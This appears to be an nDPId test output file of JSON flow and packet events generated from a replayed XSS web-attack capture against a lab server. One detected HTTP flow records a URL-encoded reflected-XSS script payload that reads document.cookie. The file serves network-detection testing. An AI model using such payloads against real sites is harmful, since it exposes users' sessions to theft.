-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5906,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":3,"flow_last_seen":1499347673137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347673137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09tZAAD4GzwGsEAABwKgKMuk4AFAtrG4ObinOqIAQAOU0kQAAAQEICgE7mNgD5WpN"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347674433,"flow_last_seen":1499347674433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347674433,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1499347674433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347674433,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DFZAAD4GuXqsEAABwKgKMulGAFBSGZZKAAAAAKACchDxsQAAAgQFtAQCCAoBO5ocAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":2,"flow_last_seen":1499347674433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347674433,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6UarF0RiUhmWS6AScSCToAAAAgQFtAQCCAoD5WuRATuaHAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5918,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":3,"flow_last_seen":1499347674434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347674434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DFdAAD4GuYGsEAABwKgKMulGAFBSGZZLqxdEY4AQAOUypwAAAQEICgE7mh0D5WuR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347675703,"flow_last_seen":1499347675703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347675703,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1499347675703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347675703,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jIRAAD4GOUysEAABwKgKMulUAFDpsRfeAAAAAKACchDXOQAAAgQFtAQCCAoBO5taAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5929,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":2,"flow_last_seen":1499347675704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347675704,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6VSdi3bc6bEX36AScSBS\/AAAAgQFtAQCCAoD5WzPATubWgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":3,"flow_last_seen":1499347675704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347675704,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jIVAAD4GOVOsEAABwKgKMulUAFDpsRffnYt23YAQAOXyAwAAAQEICgE7m1oD5WzP"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347678198,"flow_last_seen":1499347678198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678198,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":1,"flow_last_seen":1499347678198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86nhAAD4G21esEAABwKgKMuluAFCn23eyAAAAAKACchC2sQAAAgQFtAQCCAoBO53KAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":2,"flow_last_seen":1499347678198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347678198,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6W5MMi3pp9t3s6AScSDKUAAAAgQFtAQCCAoD5W8\/ATudygEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":420,"flow_packet_id":3,"flow_last_seen":1499347678199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347678199,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06nlAAD4G216sEAABwKgKMuluAFCn23ezTDIt6oAQAOVpWAAAAQEICgE7ncoD5W8\/"} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347484263,"flow_last_seen":1499347551239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232369,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347545176,"flow_last_seen":1499347550764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58332,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347546427,"flow_last_seen":1499347551497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58346,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347550209,"flow_last_seen":1499347555765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347551495,"flow_last_seen":1499347556766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58400,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347552736,"flow_last_seen":1499347557766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347678804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347679469,"flow_last_seen":1499347679469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347679469,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":1,"flow_last_seen":1499347679469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80KNAAD4G9SysEAABwKgKMul8AFCXJE+kAAAAAKACchDuKwAAAgQFtAQCCAoBO58HAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":2,"flow_last_seen":1499347679469,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347679469,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6XyRTq6MlyRPpaAScSA6zgAAAgQFtAQCCAoD5XB8ATufBwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5963,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":421,"flow_packet_id":3,"flow_last_seen":1499347679470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347679470,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00KRAAD4G9TOsEAABwKgKMul8AFCXJE+lkU6ujYAQAOXZ1AAAAQEICgE7nwgD5XB8"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347675703,"flow_last_seen":1499347679471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347679471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27SZGGJRXX6DR9VWKN864H8LTBEZ6QC3GJPC8TUUNAED3BBL4L8P%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347680746,"flow_last_seen":1499347680746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347680746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59786,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5974,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":1,"flow_last_seen":1499347680746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qSxAAD4GHKSsEAABwKgKMumKAFCMLAlrAAAAAKACchA+DwAAAgQFtAQCCAoBO6BHAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5975,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":2,"flow_last_seen":1499347680746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347680746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6YpeBd3IjCwJbKAScSCNfgAAAgQFtAQCCAoD5XG8ATugRwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5976,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":422,"flow_packet_id":3,"flow_last_seen":1499347680747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347680747,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qS1AAD4GHKusEAABwKgKMumKAFCMLAlsXgXdyYAQAOUshgAAAQEICgE7oEcD5XG8"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347683313,"flow_last_seen":1499347683313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347683313,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":1,"flow_last_seen":1499347683313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347683313,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8x61AAD4G\/iKsEAABwKgKMumkAFCTI2VlAAAAAKACchDYggAAAgQFtAQCCAoBO6LIAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":2,"flow_last_seen":1499347683313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347683313,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6aQ4uuFckyNlZqAScSBHKAAAAgQFtAQCCAoD5XQ9ATuiyAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5992,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":423,"flow_packet_id":3,"flow_last_seen":1499347683314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347683314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0x65AAD4G\/imsEAABwKgKMumkAFCTI2VmOLrhXYAQAOXmLgAAAQEICgE7oskD5XQ9"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347684563,"flow_last_seen":1499347684563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347684563,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6001,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":1,"flow_last_seen":1499347684563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347684563,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82yNAAD4G6qysEAABwKgKMumyAFDf7X8iAAAAAKACchBwtAAAAgQFtAQCCAoBO6QBAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":2,"flow_last_seen":1499347684563,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347684563,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6bLDIQ3O3+1\/I6AScSAnSAAAAgQFtAQCCAoD5XV2ATukAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":424,"flow_packet_id":3,"flow_last_seen":1499347684564,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347684564,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02yRAAD4G6rOsEAABwKgKMumyAFDf7X8jwyENz4AQAOXGTwAAAQEICgE7pAED5XV2"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347687089,"flow_last_seen":1499347687089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347687089,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":1,"flow_last_seen":1499347687089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347687089,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UahAAD4GdCisEAABwKgKMunMAFBn2\/fQAAAAAKACchBthwAAAgQFtAQCCAoBO6Z4AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6023,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":2,"flow_last_seen":1499347687089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347687089,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6cx2j8kIZ9v30aAScSCy+wAAAgQFtAQCCAoD5XftATumeAEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":425,"flow_packet_id":3,"flow_last_seen":1499347687090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347687090,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UalAAD4GdC+sEAABwKgKMunMAFBn2\/fRdo\/JCYAQAOVSAgAAAQEICgE7pnkD5Xft"} 